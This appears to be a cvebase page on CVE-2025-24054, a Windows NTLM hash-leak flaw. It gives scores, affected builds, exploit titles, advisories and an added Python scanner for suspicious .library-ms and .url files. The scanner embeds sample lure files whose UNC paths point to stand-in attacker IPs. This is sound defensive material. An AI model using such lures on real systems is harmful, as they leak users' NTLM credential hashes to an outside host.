⚠ Actively exploited
Added to CISA KEV on 2025-04-17. Federal agencies required to patch by 2025-05-08. Required action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

CVE-2025-24054: External Control of File Name or Path in Microsoft Windows 10 Version 1507

Severity
NVD: 5.4 MEDIUM | CNA: 6.5 | VulnCheck: 6.5

EPSS
11.9% (top 6.23%)

CISA KEV
Added 2025-04-17, due 2025-05-08

Exploit
Public exploit / PoC exists

Timeline
Published 2025-03-11
KEV added 2025-04-17
KEV due 2025-05-08
Latest update Feb 11

Description

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Exploitability: 2.8 | Impact: 2.5

Affected Packages (25 packages)

NVD: microsoft/windows < 10.0.14393.7876 (+5 more ranges)
NVD: microsoft/windows_10_1507 < 10.0.10240.20947
NVD: microsoft/windows_10_1607 < 10.0.14393.7876
NVD: microsoft/windows_10_1809 < 10.0.17763.7009
NVD: microsoft/windows_10_21h2 < 10.0.19044.5608

🔴 Vulnerability Details (4)

CVEList: NTLM Hash Disclosure Spoofing Vulnerability (2025-03-11)
GHSA: GHSA-6v67-599p-fprc: External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network (2025-03-11)
VulnCheck: Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability (2025)
VulnCheck: Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability (2024)

💥 Exploits & PoCs (4)

Exploit-DB: Windows 10.0.17763.7009 - spoofing vulnerability (2026-02-11)
Exploit-DB: windows 10/11 - NTLM Hash Disclosure Spoofing (2026-02-04)
Exploit-DB: Microsoft Windows 10.0.19045 - NTLMv2 Hash Disclosure (2025-08-18)
Exploit-DB: Microsoft - NTLM Hash Disclosure Spoofing (library-ms) (2025-05-01)

🔍 Detection Rules (1)

Suricata: ET EXPLOIT NTLM Hash Disclosure via InternetShortcut File Inbound with UNC Path Inbound (CVE-2024-43451) (2025-05-13)

Note: as its title says, this rule was written for CVE-2024-43451, the InternetShortcut (.url) variant of the same NTLM hash-leak technique, and it keys on that file format. The public PoCs listed above for CVE-2025-24054 use .library-ms files, so treat this rule as related coverage rather than as a detection for the .library-ms lure.
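
The network rule above keys on the InternetShortcut format. As an added example (not from cvebase, Emerging Threats or any listed PoC), the following host-side scanner applies the same idea to files on disk or pulled out of an archive: it parses .library-ms documents (the Windows Library Description XML schema) and .url files, extracts every location given as a UNC path, and reports those whose host is neither an RFC 1918 address nor under a trusted DNS suffix. The suffix `.corp.example`, the documentation-range IPs and the two sample files are constructed for this example; it covers both file types so one scanner serves the CVE-2024-43451 rule above and the .library-ms PoCs listed for this CVE.

```python
# Added example (not page, vendor or PoC code): flag .library-ms and .url files
# whose embedded locations are UNC paths to hosts outside the trusted network.
# Rendering such a file makes Explorer open the share over SMB and authenticate
# with NTLM, which is the hash leak these CVEs exploit.
import ipaddress
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# Matches \\host\share and //host/share; group 1 is the host.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")
# Namespace of the Windows Library Description schema used by .library-ms files.
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# Assumption: only RFC 1918 ranges and this hypothetical DNS suffix are trusted.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
TRUSTED_SUFFIXES = (".corp.example",)

# Constructed samples; 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges standing in for attacker infrastructure.
SAMPLE_LIBRARY_MS = """<?xml version="1.0"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Payroll</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\203.0.113.10\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
SAMPLE_INTERNAL_LIBRARY_MS = SAMPLE_LIBRARY_MS.replace("203.0.113.10", "10.20.30.40")
SAMPLE_URL = (
    "[InternetShortcut]\r\n"
    "URL=https://intranet.corp.example/\r\n"
    "IconFile=\\\\198.51.100.7\\icons\\x.ico\r\n"
    "IconIndex=1\r\n"
)


def unc_host(value: str) -> Optional[str]:
    """Host part of a UNC path, or None if the value is not a UNC path."""
    m = UNC_RE.match(value.strip())
    return m.group(1) if m else None


def is_internal(host: str) -> bool:
    """True for RFC 1918 addresses and names under a trusted suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(TRUSTED_SUFFIXES)
    return any(ip in net for net in RFC1918)


def scan_library_ms(data: str) -> List[str]:
    """UNC targets in <url> elements of a .library-ms document."""
    root = ET.fromstring(data)
    return [u.text.strip() for u in root.iter(f"{LIB_NS}url") if unc_host(u.text or "")]


def scan_url_file(data: str) -> List[str]:
    """UNC targets in the URL= and IconFile= keys of an InternetShortcut file."""
    hits = []
    for line in data.splitlines():
        key, sep, val = line.partition("=")
        if sep and key.strip().lower() in ("url", "iconfile") and unc_host(val):
            hits.append(val.strip())
    return hits


def findings(name: str, data: str) -> List[str]:
    """UNC targets in one file that point outside the trusted network."""
    lower = name.lower()
    if lower.endswith(".library-ms"):
        targets = scan_library_ms(data)
    elif lower.endswith(".url"):
        targets = scan_url_file(data)
    else:
        return []
    return [t for t in targets if not is_internal(unc_host(t))]


if __name__ == "__main__":
    for name, data in (("payroll.library-ms", SAMPLE_LIBRARY_MS),
                       ("notes.library-ms", SAMPLE_INTERNAL_LIBRARY_MS),
                       ("link.url", SAMPLE_URL)):
        print(name, findings(name, data))
```

Run it over attachment quarantines or extracted archive contents; a non-empty result is the same signal the Suricata rule raises on the wire, but independent of whether the file arrived over a channel the sensor saw.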

📋 Vendor Advisories (2)

CISA: Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability (2025-04-17)
Microsoft: NTLM Hash Disclosure Spoofing Vulnerability (2025-03-11)

🕵️ Threat Intelligence (7)

Securelist: Old tech, new vulnerabilities: NTLM abuse, ongoing exploitation in 2025 (2025-11-26)
Securelist: How NTLM is being abused in 2025 cyberattacks (2025-11-26)
Bleepingcomputer: Microsoft Outlook to block more risky attachments used in attacks (2025-06-10)
Bleepingcomputer: Windows NTLM hash leak flaw exploited in phishing attacks on governments (2025-04-17)
Qualys: Microsoft and Adobe Patch Tuesday, March 2025 Security Update Review (2025-03-11)
CVE-2025-24054 — External Control of File Name or Path | cvebase